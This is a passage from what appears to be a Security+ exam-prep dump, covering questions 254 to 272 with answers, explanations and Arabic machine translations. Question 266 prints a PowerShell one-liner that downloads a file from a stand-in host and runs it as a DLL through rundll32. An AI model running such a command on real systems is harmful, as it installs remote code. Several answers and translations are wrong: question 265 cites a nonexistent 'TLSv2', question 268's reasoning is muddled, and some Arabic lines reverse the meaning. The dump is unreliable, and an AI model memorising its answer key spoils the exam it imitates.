.‫ في أوقات مختلفة‬Word ‫تم تعطيل حساب بعد العديد من اتصالات تسجيل الدخول الفاشلة والناجحة من أجزاء مختلفة من‬
‫ أي من سياسات الحساب التالية على الأرجح أدى إلى تشغيل الإجراء لتعطيل؟‬.‫محلل أمني يحقق في القضية‬
‫وقت السفر المستحيل‬
‫ وقت السفر المستحيل هو سياسة تكتشف وتحظر محاولات تسجيل الدخول من المواقع التي يستحيل الوصول إليها‬:‫تفسير‬
‫ إذا قام مستخدم بتسجيل الدخول من‬،‫ على سبيل المثال‬.‫جغرافيا من موقع تسجيل الدخول السابق خلال إطار زمني معين‬
‫ فإن السياسة ستضع علامة على ذلك على أنه وقت سفر‬،‫نيويورك ثم حاول تسجيل الدخول من طوكيو في غضون ساعة‬
‫ يساعد هذا النهج على منع الوصول غير المصرح به من بيانات الاعتماد المخترقة أو المهاجمين‬.‫مستحيل وتعطل الحساب‬
.‫الذين يستخدمون خوادم وكيلة‬
136 / 198
The safer , easier way to help you pass any IT exams.
254.A security architect is designing a remote access solution for a business partner. The business
partner needs to access one Linux server at the company. The business partner wants to avid managing
a password for authentication and additional software installation.
Which of the following should the architect recommend?
A. Soft token
B. Smart card
C. CSR
D. SSH key
Answer: D
Explanation:
SSH key is a pair of cryptographic keys that can be used for authentication and encryption when
connecting to a remote Linux server via SSH protocol. SSH key authentication does not require a
password and is more secure than password-based authentication. SSH key authentication also does
not require additional software installation on the client or the server, as SSH is a built-in feature of most
Linux distributions. A business partner can generate an SSH key pair on their own computer and send
the public key to the company, who can then add it to the authorized_keys file on the Linux server. This
way, the business partner can access the Linux server without entering a password or installing any
software.
‫ واحد‬Linux ‫ يحتاج شريك العمل إلى الوصول إلى خادم‬.‫ يقوم مهندس أمني بتصميم حل للوصول عن بعد لشريك تجاري‬-254
‫ أي مما يلي يجب أن يوصي به المهندس‬.‫ يريد شريك الأعمال إدارة كلمة مرور للمصادقة وتثبيت برامج إضافية‬.‫في الشركة‬
‫المعماري؟ مفتاح اس اس اتش‬
‫ بعيد عبر‬Linux ‫ هو زوج من مفاتيح التشفير التي يمكن استخدامها للمصادقة والتشفير عند الاتصال بخادم‬SSH ‫ مفتاح‬:‫تفسير‬
‫ لا تتطلب‬.‫ كلمة مرور وهي أكثر أمانا من المصادقة المستندة إلى كلمة مرور‬SSH ‫ لا تتطلب مصادقة مفتاح‬.SSH ‫بروتوكول‬
‫ هي ميزة مضمنة في معظم توزيعات‬SSH ‫ حيث أن‬، ‫ أيضا تثبيت برامج إضافية على العميل أو الخادم‬SSH ‫مصادقة مفتاح‬
‫ والتي‬، ‫ على أجهزة الكمبيوتر الخاصة به وإرسال المفتاح العام إلى الشركة‬SSH ‫ يمكن لشريك الأعمال إنشاء زوج مفاتيح‬.Linux
‫ يمكن لشريك الأعمال الوصول إلى‬، ‫ بهذه الطريقة‬.Linux ‫ على خادم‬authorized_keys ‫يمكنها بعد ذلك إضافته إلى ملف‬
.‫ دون إدخال كلمة مرور أو تثبيت أي برنامج‬Linux ‫خادم‬
137 / 198
The safer , easier way to help you pass any IT exams.
255.A company recently implemented a patch management policy; however, vulnerability scanners have
still been flagging several hosts, even after the completion of the patch process.
Which of the following is the most likely cause of the issue?
A. The vendor firmware lacks support.
B. Zero-day vulnerabilities are being discovered.
C. Third-party applications are not being patched.
D. Code development is being outsourced.
Answer: C
Explanation:
Third-party applications are applications that are developed and provided by external vendors or
sources, rather than by the organization itself. Third-party applications may introduce security risks if
they are not properly vetted, configured, or updated. One of the most likely causes of vulnerability
scanners flagging several hosts after the completion of the patch process is that third-party applications
are not being patched. Patching is the process of applying updates or fixes to software to address bugs,
vulnerabilities, or performance issues. Patching third-party applications is essential for maintaining their
security and functionality, as well as preventing attackers from exploiting known flaws.
‫ لا تزال ماسحات الثغرات الأمنية تضع علامة على‬، ‫ ونفذت إحدى الشركات مؤخرا سياسة لإدارة الرقعات؛ ومع ذلك‬-255
‫ أي مما يلي هو السبب الأكثر احتمالا للمشكلة؟‬.‫ حتى بعد الانتهاء من عملية التصحيح‬، ‫العديد من المضيفين‬
.‫لا يتم تصحيح تطبيقات الطرف الثالث‬
256.A security analyst needs to recommend a solution that will allow current Active Directory accounts
and groups to be used for access controls on both network and remote-access devices.
Which of the following should the analyst recommend? (Select two).
A. TACACS+
B. RADIUS
C. OAuth
D. OpenlD
E. Kerberos
F. CHAP
Answer: B,E
Explanation:
RADIUS and Kerberos are two protocols that can be used to integrate Active Directory accounts and
groups with network and remote-access devices. RADIUS is a protocol that provides centralized
authentication, authorization, and accounting for network access. It can use Active Directory as a
backend database to store user credentials and group memberships. Kerberos is a protocol that
provides secure authentication and encryption for network services. It is the default authentication
protocol for Active Directory and can be used by remote-access devices that support it.
‫يحتاج محلل الأمان إلى التوصية بحل يسمح بحسابات نشطة راديو الحالية والمجموعات التي سيتم استخدامها‬.256
‫ أي مما يلي يجب أن يوصي به المحلل؟‬.‫لعناصر التحكم في الوصول على كل من الشبكة وأجهزة الوصول عن بعد‬
‫ ؟ راديو _ كيربيريوس‬.)‫(حدد اثنين‬
‫ مع أجهزة‬Directory Active ‫ هما بروتوكولان يمكن استخدامهما لدمج حسابات ومجموعات‬Kerberos‫ و‬RADIUS :‫تفسير‬
‫ يمكنه‬.‫ هو بروتوكول يوفر مصادقة مركزية وتخويل ومحاسبة للوصول إلى الشبكة‬RADIUS .‫الشبكة والوصول عن بعد‬
‫ هو‬Kerberos .‫ كقاعدة بيانات خلفية لتخزين بيانات اعتماد المستخدم وعضويات المجموعة‬Directory Active ‫استخدام‬
‫ ويمكن‬Directory Active ‫ إنه بروتوكول المصادقة الافتراضي ل‬.‫بروتوكول يوفر مصادقة وتشفيرا آمنين لخدمات الشبكة‬
.‫استخدامه بواسطة أجهزة الوصول عن بعد التي تدعمه‬
138 / 198
The safer , easier way to help you pass any IT exams.
257.A company completed a vulnerability scan. The scan found malware on several systems that were
running older versions of Windows. Which of the following is MOST likely the cause of the malware
infection?
A. Open permissions
B. Improper or weak patch management
C. Unsecure root accounts
D. Default settings
Answer: B
Explanation:
The reason for this is that older versions of Windows may have known vulnerabilities that have been
patched in more recent versions. If a company is not regularly patching their systems, they are leaving
those vulnerabilities open to exploit, which can allow malware to infect the systems.
It is important to regularly update and patch systems to address known vulnerabilities and protect
against potential malware infections. This is an important aspect of proper security management.
Here is a reference to the CompTIA Security+ certification guide which states that "Properly configuring
and maintaining software, including patch management, is critical to protecting systems and data."
‫ أي‬.Windows ‫ وجد الفحص برامج ضارة على العديد من الأنظمة التي كانت تعمل بإصدارات أقدم من‬.‫ أكملت شركة فحصا للثغرات الأمنية‬-257
‫مما يلي هو على الأرجح سبب الإصابة بالبرامج الضارة؟ إدارة التصحيح غير الصحيحة أو الضعيفة‬
‫ إذا لم تقم‬.‫ قد تكون معروفة ثغرات أمنية تم تصحيحها في الإصدارات الأحدث‬Windows ‫ والسبب في ذلك هو أن الإصدارات القديمة من‬:‫تفسير‬
‫ من المهم‬.‫ مما قد يسمح للبرامج الضارة بإصابة الأنظمة‬، ‫ فإنها تترك نقاط الضعف هذه مفتوحة للاستغلال‬، ‫الشركة بتصحيح أنظمتها بانتظام‬
‫ هذا جانب مهم من جوانب‬.‫تحديث الأنظمة وتصحيحها بانتظام لمعالجة نقاط الضعف المعروفة والحماية من الإصابات المحتملة بالبرامج الضارة‬
‫ بما في‬، ‫ الذي ينص على أن "تكوين البرامج وصيانتها بشكل صحيح‬+ Security CompTIA ‫ فيما يلي إشارة إلى دليل شهادة‬.‫الإدارة الأمنية السليمة‬
."‫ أمر بالغ الأهمية لحماية الأنظمة والبيانات‬، ‫ذلك إدارة التصحيح‬
258.A user is trying unsuccessfully to send images via SMS. The user downloaded the images from a
corporate email account on a work phone. Which of the following policies is preventing the user from
completing this action?
A. Application management
B. Content management
C. Containerization
D. Full disk encryption
Answer: B
Explanation:
Content management is a policy that controls what types of data can be accessed, modified, shared, or
transferred by users or applications. Content management can prevent data leakage or exfiltration by
blocking or restricting certain actions, such as copying, printing, emailing, or sending data via SMS. If the
user downloaded the images from a corporate email account on a work phone, the content management
policy may prevent the user from sending the images via SMS to protect the confidentiality and integrity
of the data.
‫ قام المستخدم بتنزيل الصور من حساب بريد إلكتروني‬.‫ يحاول مستخدم دون جدوى إرسال الصور عبر الرسائل القصيرة‬-258
‫ أي من النهج التالية يمنع المستخدم من إكمال هذا الإجراء؟ إدارة المحتوى‬.‫للشركة على هاتف العمل‬
‫ إدارة المحتوى هي سياسة تتحكم في أنواع البيانات التي يمكن الوصول إليها أو تعديلها أو مشاركتها أو نقلها من قبل‬:‫تفسير‬
‫ مثل‬، ‫ يمكن لإدارة المحتوى منع تسرب البيانات أو نقلها عن طريق حظر أو تقييد إجراءات معينة‬.‫المستخدمين أو التطبيقات‬
‫ إذا قام المستخدم بتنزيل الصور من حساب‬.‫النسخ أو الطباعة أو البريد الإلكتروني أو إرسال البيانات عبر الرسائل القصيرة‬
‫ فقد تمنع سياسة إدارة المحتوى المستخدم من إرسال الصور عبر الرسائل القصيرة‬، ‫بريد إلكتروني للشركة على هاتف العمل‬
.‫لحماية سرية البيانات وسلامتها‬
139 / 198
The safer , easier way to help you pass any IT exams.
259.Which of the following best describes when an organization Utilizes a read-to-use application from a
cloud provider?
A. IaaS
B. SaaS
C. PaaS
D. XaaS
Answer: B
Explanation:
SaaS stands for software as a service, which is a cloud computing model that provides ready-to-use
applications over the internet. SaaS applications are hosted and managed by a cloud provider who also
handles software updates, maintenance, security, and scalability. SaaS users can access the
applications through a web browser or a mobile app without installing any software on their devices.
SaaS applications are typically offered on a subscription or pay-per-use basis. Examples of SaaS
applications include email services, online office suites, customer relationship management (CRM)
systems, and video conferencing platforms.
‫أي مما يلي يصف بشكل أفضل عندما تستخدم مؤسسة تطبيقا للقراءة للاستخدام من موفر سحابة؟ سااس‬.259
‫ يتم استضافة‬.‫ وهي نموذج حوسبة سحابية يوفر تطبيقات جاهزة للاستخدام عبر الإنترنت‬، ‫ تعني البرامج كخدمة‬SaaS :‫تفسير‬
‫ يمكن‬.‫ وإدارتها بواسطة مزود سحابة يتعامل أيضا مع تحديثات البرامج والصيانة والأمان وقابلية التوسع‬SaaS ‫تطبيقات‬
‫ الوصول إلى التطبيقات من خلال متصفح الويب أو تطبيق الهاتف المحمول دون تثبيت أي برنامج على‬SaaS ‫لمستخدمي‬
‫ خدمات‬SaaS ‫ تتضمن أمثلة تطبيقات‬.‫ على أساس الاشتراك أو الدفع لكل استخدام‬SaaS ‫ عادة ما يتم تقديم تطبيقات‬.‫أجهزتهم‬
.‫) ومنصات مؤتمرات الفيديو‬CRM( ‫البريد الإلكتروني ومجموعات المكاتب عبر الإنترنت وأنظمة إدارة علاقات العملاء‬
260.A user received an SMS on a mobile phone that asked for bank details.
Which of the following social engineering techniques was used in this case?
A. SPIM
B. Vishing
C. Spear phishing
D. Smishing
Answer: D
Explanation:
Smishing is a type of social engineering technique that involves sending fraudulent or malicious text
messages (SMS) to a user’s mobile phone. It can trick the user into providing personal or financial
information, clicking on malicious links, downloading malware, etc., by impersonating a legitimate entity
or creating a sense of urgency or curiosity.
‫ أي تقنيات الهندسة الاجتماعية‬.‫ تلقى أحد المستخدمين رسالة نصية قصيرة على هاتف محمول تطلب تفاصيل مصرفية‬-260
..‫الآتية استخدمت في هذه الحالة؟ التصيد الاحتيالي‬
‫) إلى‬SMS( ‫ التصيد الاحتيالي هو نوع من تقنيات الهندسة الاجتماعية التي تتضمن إرسال رسائل نصية احتيالية أو ضارة‬:‫تفسير‬
‫ وتنزيل‬، ‫ والنقر على الروابط الضارة‬، ‫ يمكنه خداع المستخدم لتقديم معلومات شخصية أو مالية‬.‫الهاتف المحمول للمستخدم‬
.‫ عن طريق انتحال شخصية كيان شرعي أو خلق شعور بالإلحاح أو الفضول‬، ‫ وما إلى ذلك‬، ‫البرامج الضارة‬
140 / 198
The safer , easier way to help you pass any IT exams.
261. An organization recently released a software assurance policy that requires developers to run code
scans each night on the repository. After the first night, the security team alerted the developers that
more than 2,000 findings were reported and need to be addressed.
Which of the following is the MOST likely cause for the high number of findings?
A. The vulnerability scanner was not properly configured and generated a high number of false
positives
B. Third-party libraries have been loaded into the repository and should be removed from the codebase.
C. The vulnerability scanner found several memory leaks during runtime, causing duplicate reports for
the same issue.
D. The vulnerability scanner was not loaded with the correct benchmarks and needs to be updated.
Answer: A
Explanation:
The most likely cause for the high number of findings is that the vulnerability scanner was not properly
configured and generated a high number of false positives. False positive results occur when a
vulnerability scanner incorrectly identifies a non-vulnerable system or application as being vulnerable.
This can happen due to incorrect configuration, over-sensitive rule sets, or outdated scan databases.
‫أصدرت إحدى المؤسسات مؤخرا سياسة ضمان البرامج التي تتطلب من المطورين تشغيل عمليات فحص التعليمات البرمجية كل‬
‫ أي‬.‫ نتيجة وتحتاج إلى معالجة‬2000 ‫ نبه فريق الأمن المطورين إلى أنه تم الإبلاغ عن أكثر من‬، ‫ بعد الليلة الأولى‬.‫ليلة على المستودع‬
‫مما يلي هو السبب الأكثر احتمالا لارتفاع عدد النتائج؟ لم يتم تكوين أداة فحص الثغرات الأمنية بشكل صحيح وولدت عددا كبيرا من‬
‫الإيجابيات الخاطئة‬
‫ السبب الأكثر ترجيحا للعدد الكبير من النتائج هو أن ماسح الثغرات الأمنية لم يتم تكوينه بشكل صحيح وولد عددا كبيرا من‬:‫تفسير‬
‫ تحدث النتائج الإيجابية الخاطئة عندما يحدد ماسح الثغرات الأمنية بشكل غير صحيح نظاما أو تطبيقا غير ضعيف‬.‫الإيجابيات الخاطئة‬
‫ يمكن أن يحدث هذا بسبب التكوين غير الصحيح أو مجموعات القواعد شديدة الحساسية أو قواعد بيانات الفحص‬.‫على أنه ضعيف‬
.‫القديمة‬
262. An organization recently completed a security control assessment The organization determined
some controls did not meet the existing security measures. Additional mitigations are needed to
lessen the risk of the non-complaint controls. Which of the following best describes these
mitigations?
A. Corrective
B. Compensating
C. Deterrent
D. Technical
Answer: B
Explanation:
Compensating controls are additional security measures that are implemented to reduce the risk of noncompliant controls. They do not fix the underlying issue, but they provide an alternative way of achieving
the same security objective. For example, if a system does not have encryption, a compensating control
could be to restrict access to the system or use a secure network connection.
‫ هناك حاجة إلى‬.‫أكملت منظمة مؤخرا تقييما للرقابة الأمنية قررت المنظمة أن بعض الضوابط لا تفي بالتدابير الأمنية الحالية‬
‫ أي من الآتي يصف عمليات التخفيف هذه؟ تعويض‬.‫تخفيفات إضافية لتقليل مخاطر ضوابط عدم تقديم الشكاوى‬
‫ إنها لا تصلح‬.‫ الضوابط التعويضية هي تدابير أمنية إضافية يتم تنفيذها لتقليل مخاطر الضوابط غير المتوافقة‬:‫تفسير‬
، ‫ إذا لم يكن لدى النظام تشفير‬، ‫ على سبيل المثال‬.‫ لكنها توفر طريقة بديلة لتحقيق نفس الهدف الأمني‬، ‫المشكلة الأساسية‬
.‫فقد يكون عنصر التحكم التعويضي هو تقييد الوصول إلى النظام أو استخدام اتصال شبكة آمن‬
141 / 198
The safer , easier way to help you pass any IT exams.
263. While reviewing the /etc/shadow file, a security administrator notices files with the same values.
Which of the following attacks should the administrator be concerned about?
A. Plaintext
B. Birthdat
C. Brute-force
D. Rainbow table
Answer: D
Explanation:
Rainbow table is a type of attack that should concern a security administrator when reviewing the
/etc/shadow file.
‫ أي من الهجمات التالية يجب أن يهتم بها‬.‫ يلاحظ مسؤول الأمان الملفات التي لها نفس القيم‬،shadow/etc/ ‫أثناء مراجعة ملف‬
‫المسؤول؟ طاولة قوس قزح‬
.‫ ملف الظل‬/ ‫ جدول قوس قزح هو نوع من الهجوم الذي يجب أن يهم مسؤول الأمن عند مراجعة‬:‫التفسير‬
Which of the following types of controls is a turnstile?
A. Physical
B. Detective
C. Corrective
D. Technical
Answer: A
Explanation:
A turnstile is a physical security control that regulates the entry and exit of people into a facility or an
area. It can prevent unauthorized access, tailgating, etc., by requiring valid credentials or tokens to pass
through
‫أي أنواع عناصر التحكم الآتية عبارة عن باب دوار؟ بدني‬
‫ يمكن أن يمنع الوصول‬.‫ الباب الدوار هو عنصر تحكم أمني مادي ينظم دخول وخروج الأشخاص إلى منشأة أو منطقة‬:‫تفسير‬
‫ من خلال طلب بيانات اعتماد أو رموز صالحة للمرور‬، ‫ وما إلى ذلك‬، ‫ والذيل‬، ‫غير المصرح به‬
142 / 198
The safer , easier way to help you pass any IT exams.
265.A security analyst is hardening a network infrastructure
The analyst is given the following requirements
• Preserve the use of public IP addresses assigned to equipment on the core router
• Enable "in transport" encryption protection to the web server with the strongest ciphers.
Which of the following should the analyst implement to meet these requirements? (Select two).
A. Configure VLANs on the core router
B. Configure NAT on the core router.
C. Configure BGP on the core router
D. Enable AES encryption on the web server
E. Enable 3DES encryption on the web server
F. Enable TLSv2 encryption on the web server
Answer: B,F
Explanation:
NAT (Network Address Translation) is a technique that allows a router to translate private IP addresses
into public IP addresses and vice versa. It can preserve the use of public IP addresses assigned to
equipment on the core router by allowing multiple devices to share a single public IP address. TLSv2
(Transport Layer Security version 2) is a cryptographic protocol that provides secure communication over
the internet. It can enable “in transport” encryption protection to the web server with the strongest ciphers
by encrypting the data transmitted between the web server and the clients using advanced algorithms
and key exchange methods.
‫محلل أمني يعمل على تقوية البنية التحتية للشبكة يتم إعطاء المحلل المتطلبات التالية الحفاظ على استخدام عناوين‬.
‫العامة المخصصة للمعدات الموجودة على جهاز التوجيه الأساسي قم بتمكين حماية التشفير "أثناء النقل" لخادم الويب بأقوى‬
.)‫ أي مما يلي يجب على المحلل تنفيذه لتلبية هذه المتطلبات؟ (حدد اثنين‬.‫الأصفار‬
‫ على خادم الويب‬TLSv2 ‫ _ تمكين تشفير‬.‫ على جهاز التوجيه الأساسي‬NAT ‫تكوين‬
.‫ عامة والعكس صحيح‬IP ‫ الخاصة إلى عناوين‬IP ‫ (ترجمة عنوان الشبكة) هي تقنية تسمح لجهاز التوجيه بترجمة عناوين‬NAT :‫تفسير‬
‫ العامة المخصصة للمعدات الموجودة على جهاز التوجيه الأساسي من خلال السماح لأجهزة‬IP ‫يمكنه الحفاظ على استخدام عناوين‬
‫ يمكنه‬.‫) هو بروتوكول تشفير يوفر اتصالا آمنا عبر الإنترنت‬2 ‫ (أمان طبقة النقل الإصدار‬TLSv2 .‫ عام واحد‬IP ‫متعددة بمشاركة عنوان‬
‫تمكين حماية التشفير "أثناء النقل" لخادم الويب بأقوى الأصفار عن طريق تشفير البيانات المنقولة بين خادم الويب والعملاء باستخدام‬
.‫خوارزميات متقدمة وطرق تبادل المفاتيح‬
143 / 198
The safer , easier way to help you pass any IT exams.
266.An employee received an email with an unusual file attachment named Updates . Lnk. A security
analysts reverse engineering what the fle does and finds that executes the folowing script:
C:\Windows \System32\WindowsPowerShell\vl.0\powershell.exe -URI https://somehost.com/04EB18.jpg
-OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe $env:TEMP\autoupdate.dll
Which of the following BEST describes what the analyst found?
A. A Powershell code is performing a DLL injection.
B. A PowerShell code is displaying a picture.
C. A PowerShell code is configuring environmental variables.
D. A PowerShell code is changing Windows Update settings.
Answer: A
Explanation:
According to GitHub user JSGetty196’s notes1, a PowerShell code that uses rundll32.exe to execute a
DLL file is performing a DLL injection attack. This is a type of code injection attack that exploits the
Windows process loading mechanism. https://www.comptia.org/training/books/security-sy0-601-studyguide
‫ يقوم محللو الأمن بالهندسة العكسية لما يفعله‬.Lnk . ‫ تلقى أحد الموظفين بريدا إلكترونيا يحتوي على مرفق ملف غير عادي يسمى التحديثات‬-266
‫ أوري‬exe. ‫ \\ بوويرشيل‬0.vl \ ‫ \\ و يندوزبوويرشيل‬System32 \\ ‫ \\ و يندوز‬: ‫ جيم‬:folowing ‫ و يجدون أنه ينفذ البرنامج النصي‬fle
exe .rundll32 ‫ ؛ بدء عملية‬dll. ‫ درجة الحرارة \\ التحديث التلقائي‬:‫ ملف خارجي‬env$ https://somehost.com/04EB18.jpg
‫ أي مما يلي يصف ما وجده المحلل؟‬dll.autoupdate\TEMP:$env
.DLL ‫ بإجراء حقن‬Powershell ‫يقوم رمز‬
‫ يقوم بتنفيذ هجوم‬DLL ‫ لتنفيذ ملف‬exe.rundll32 ‫ الذي يستخدم‬PowerShell ‫ فإن رمز‬، 1 JSGetty196 GitHub ‫ وفقا لملاحظات مستخدم‬:‫تفسير‬
.Windows ‫ هذا نوع من هجوم حقن التعليمات البرمجية الذي يستغل آلية تحميل عملية‬.DLL ‫حقن‬
‫ دليل‬-https://www.comptia.org/training/books/security-sy0-601-study
267.A network-connected magnetic resonance imaging (MRI) scanner at a hospital is controlled and
operated by an outdated and unsupported specialized Windows OS.
Which of the following is most likely preventing the IT manager at the hospital from upgrading the specialized
OS?
A. The time needed for the MRI vendor to upgrade the system would negatively impact patients.
B. The MRI vendor does not support newer versions of the OS.
C. Changing the OS breaches a support SLA with the MRI vendor.
D. The IT team does not have the budget required to upgrade the MRI scanner.
Answer: B
Explanation:
This option is the most likely reason for preventing the IT manager at the hospital from upgrading the
specialized OS. The MRI scanner is a complex and sensitive device that requires a specific OS to control
and operate it. The MRI vendor may not have developed or tested newer versions of the OS for
compatibility and functionality with the scanner. Upgrading the OS without the vendor’s support may
cause the scanner to malfunction or stop working altogether.
‫ ويقوم ماسح ضوئي للتصوير بالرنين المغناطيسي متصل بالشبكة في مستشفى بالتحكم في نظام تشغيل ويندوز‬-267
‫ أي مما يلي يمنع على الأرجح مدير تكنولوجيا المعلومات في المستشفى من ترقية نظام‬.‫متخصص قديم وغير مدعوم‬
.‫التشغيل المتخصص؟ لا يدعم مورد التصوير بالرنين المغناطيسي الإصدارات الأحدث من نظام التشغيل‬
‫ هذا الخيار هو السبب الأكثر ترجيحا لمنع مدير تكنولوجيا المعلومات في المستشفى من ترقية نظام التشغيل‬:‫تفسير‬
.‫ ماسح التصوير بالرنين المغناطيسي هو جهاز معقد وحساس يتطلب نظام تشغيل معين للتحكم فيه وتشغيله‬.‫المتخصص‬
‫ربما لم يقم مورد التصوير بالرنين المغناطيسي بتطوير أو اختبار إصدارات أحدث من نظام التشغيل للتأكد من توافقها‬
‫ قد تؤدي ترقية نظام التشغيل دون دعم البائع إلى تعطل الماسح الضوئي أو توقفه عن العمل‬.‫ووظائفها مع الماسح الضوئي‬
.‫تماما‬
144 / 198
The safer , easier way to help you pass any IT exams.
268. Which of the following can reduce vulnerabilities by avoiding code reuse?
A. Memory management
B. Stored procedures
C. Normalization
D. Code obfuscation
Answer: A
Explanation:
Memory management is a technique that can allocate and deallocate memory for applications and
processes. Memory management can reduce vulnerabilities by avoiding code reuse, which is a
technique that exploits a memory corruption vulnerability to execute malicious code that already exists in
memory. Memory management can prevent code reuse by implementing features such as address
space layout randomization (ASLR), data execution prevention (DEP), or stack canaries.
‫أي مما يلي يمكن أن يقلل من الثغرات الأمنية عن طريق تجنب إعادة استخدام التعليمات البرمجية؟ إدارة الذاكرة‬
‫ يمكن لإدارة الذاكرة تقليل‬.‫ إدارة الذاكرة هي تقنية يمكنها تخصيص الذاكرة وإلغاء تخصيصها للتطبيقات والعمليات‬:‫تفسير‬
‫ وهي تقنية تستغل ثغرة تلف الذاكرة لتنفيذ تعليمات‬، ‫الثغرات الأمنية عن طريق تجنب إعادة استخدام التعليمات البرمجية‬
‫ يمكن لإدارة الذاكرة منع إعادة استخدام التعليمات البرمجية من خلال تنفيذ ميزات‬.‫برمجية ضارة موجودة بالفعل في الذاكرة‬
.‫) أو الكناري المكدسة‬DEP( ‫) أو منع تنفيذ البيانات‬ASLR( ‫مثل التوزيع العشوائي لتخطيط مساحة العنوان‬
269. CORRECT TEXT
During an assessment, a systems administrator found several hosts running FTP and decided to
immediately block FTP communications at the firewall. Which of the following describes the greatest risk
associated with using FTP?
A Private data can be leaked
B. FTP is prohibited by internal policy.
C. Users can upload personal files
D. Credentials are sent in cleartext.
Answer: D
Explanation:
Credentials are sent in cleartext is the greatest risk associated with using FTP. FTP is an old protocol
that does not encrypt the data or the credentials that are transmitted over the network. This means that
anyone who can capture the network traffic can see the usernames and passwords of the FTP users, as
well as the files they are transferring. This can lead to data breaches, identity theft, and unauthorized
access. Private data can be leaked (Option A) is a possible consequence of using FTP, but not the root
cause of the risk. FTP is prohibited by internal policy (Option B) is a compliance issue, but not a technical
risk
FTP ‫ وقرر حظر اتصالات‬FTP ‫ وجد مسؤول الأنظمة العديد من المضيفين الذين يقومون بتشغيل‬، ‫النص الصحيح أثناء التقييم‬
‫؟‬FTP ‫ أي مما يلي يصف أكبر خطر مرتبط باستخدام‬.‫على الفور في جدار الحماية‬
‫يتم إرسال بيانات الاعتماد في نص واضح‬
‫ هو بروتوكول قديم لا يقوم بتشفير‬FTP .FTP ‫ يتم إرسال بيانات الاعتماد في نص واضح هو أكبر خطر مرتبط باستخدام‬:‫تفسير‬
‫ هذا يعني أن أي شخص يمكنه التقاط حركة مرور الشبكة يمكنه رؤية‬.‫البيانات أو بيانات الاعتماد التي يتم إرسالها عبر الشبكة‬
‫ يمكن أن يؤدي ذلك إلى‬.‫ بالإضافة إلى الملفات التي يقومون بنقلها‬، FTP ‫أسماء المستخدمين وكلمات المرور لمستخدمي‬
‫ يمكن تسريب البيانات الخاصة (الخيار أ) هو نتيجة محتملة لاستخدام‬.‫خروقات البيانات وسرقة الهوية والوصول غير المصرح به‬
‫ ولكنه ليس‬، ‫ محظور بموجب السياسة الداخلية (الخيار ب) هو مشكلة امتثال‬FTP .‫ ولكن ليس السبب الجذري للمخاطر‬، FTP
‫خطرا فنيا‬
145 / 198
The safer , easier way to help you pass any IT exams.
270.A security team is providing input on the design of a secondary data center that has the following
requirements:
+ Anatural disaster at the primary site should not affect the secondary site. The secondary site should
have the capability for failover during traffic surge situations.
+ The secondary site must meet the same physical security requirements as the primary site. The
secondary site must provide protection against power surges and outages.
Which of the following should the security team recommend? (Select two).
A. Coniguring replication of the web servers at the primary site to offline storage
B. Constructing the secondary site in a geographically disperse location
C. Deploying load balancers at the primary site
D. Installing generators
E. Using differential backups at the secondary site
F. Implementing hot and cold aisles at the secondary site
Answer: B,D
Explanation:
B. Constructing the secondary site in a geographically disperse location would ensure that a natural
disaster at the primary site would not affect the secondary site. It would also allow for failover during
traffic surge situations by distributing the load across different regions.
D. Installing generators would provide protection against power surges and outages by providing backup
power sources in case of a failure. Generators are part of the physical security requirements for data
centers as they ensure availability and resilience.
‫ يجب ألا تؤثر الكوارث‬+ :‫ و يقدم فريق أمني مدخلات بشأن تصميم مركز بيانات ثانوي تتوفر فيه المتطلبات التالية‬-270
‫ يجب أن يكون لدى الموقع الثانوي القدرة على تجاوز الفشل أثناء حالات‬.‫الطبيعية في الموقع الأساسي على الموقع الثانوي‬
‫ يجب أن يوفر الموقع‬.‫ يجب أن يفي الموقع الثانوي بنفس متطلبات الأمان المادي مثل الموقع الأساسي‬+ .‫ز يادة حركة المرور‬
.)‫ أي مما يلي يجب أن يوصي به فريق الأمان؟ (حدد اثنين‬.‫الثانوي الحماية ضد ارتفاع التيار الكهربائي وانقطاعه‬
‫بناء الموقع الثانوي في موقع متفرق جغرافيا _ تركيب المولدات‬
‫ إن بناء الموقع الثانوي في موقع متفرق جغرافيا من شأنه أن يضمن عدم تأثير كارثة طبيعية في الموقع الرئيسي‬.‫ ب‬:‫تفسير‬
.‫ د‬.‫ كما سيسمح بتجاوز الفشل أثناء حالات زيادة حركة المرور من خلال توزيع الحمل عبر مناطق مختلفة‬.‫على الموقع الثانوي‬
‫سيوفر تركيب المولدات الحماية ضد ارتفاع التيار الكهربائي وانقطاعه من خلال توفير مصادر طاقة احتياطية في حالة حدوث‬
.‫ تعد المولدات جزءا من متطلبات الأمان المادي لمراكز البيانات لأنها تضمن التوافر والمرونة‬.‫عطل‬
146 / 198
The safer , easier way to help you pass any IT exams.
271.A company policy requires third-party suppliers to self-report data breaches within a specific time
frame. Which of the following third-party risk management policies is the company complying with?
A. MOU
B. SLA
C. EOL
D. NDA
Answer: B
Explanation:
An SLA or service level agreement is a type of third-party risk management policy that defines the
expectations and obligations between a service provider and a customer. An SLA typically includes
metrics and standards for measuring the quality and performance of the service, as well as penalties or
remedies for non-compliance. An SLA can also specify the reporting requirements for data breaches or
other incidents that may affect the customer’s security or privacy.
‫ أي‬.‫ وتقتضي سياسة الشركة من موردي الأطراف الثالثة الإبلاغ الذاتي عن انتهاكات البيانات في غضون إطار زمني محدد‬-271
‫من سياسات إدارة مخاطر الطرف الثالث التالية تمتثل لها الشركة؟ سلا‬
‫ اتفاقية مستوى الخدمة أو اتفاقية مستوى الخدمة هي نوع من سياسة إدارة مخاطر الطرف الثالث التي تحدد‬:‫تفسير‬
‫ تتضمن اتفاقية مستوى الخدمة عادة مقاييس ومعايير قياس جودة وأداء‬.‫التوقعات والالتزامات بين مزود الخدمة والعميل‬
‫ يمكن لاتفاقية مستوى الخدمة أيضا تحديد متطلبات الإبلاغ عن‬.‫ وكذلك العقوبات أو سبل الانتصاف لعدم الامتثال‬، ‫الخدمة‬
.‫انتهاكات البيانات أو الحوادث الأخرى التي قد تؤثر على أمان العميل أو خصوصيته‬
272.A systems integrator is installing a new access control system for a building. The new system will
need to connect to the Company's AD server In order to validate current employees.
Which of the following should the systems integrator configure to be the most secure?
A. HTTPS
B. SSH
C. SFTP
D. LDAPS
Answer: D
Explanation:
LDAPS (Lightweight Directory Access Protocol Secure) is the most secure protocol to use for connecting
to an Active Directory server, as it encrypts the communication between the client and the server using
SSL/TLS. This prevents eavesdropping, tampering, or spoofing of the authentication and authorization
data.
‫ سيحتاج النظام الجديد إلى الاتصال بخادم‬.‫ وتقوم شركة تكامل نظم بتركيب نظام جديد لمراقبة الدخول إلى أحد المباني‬-272
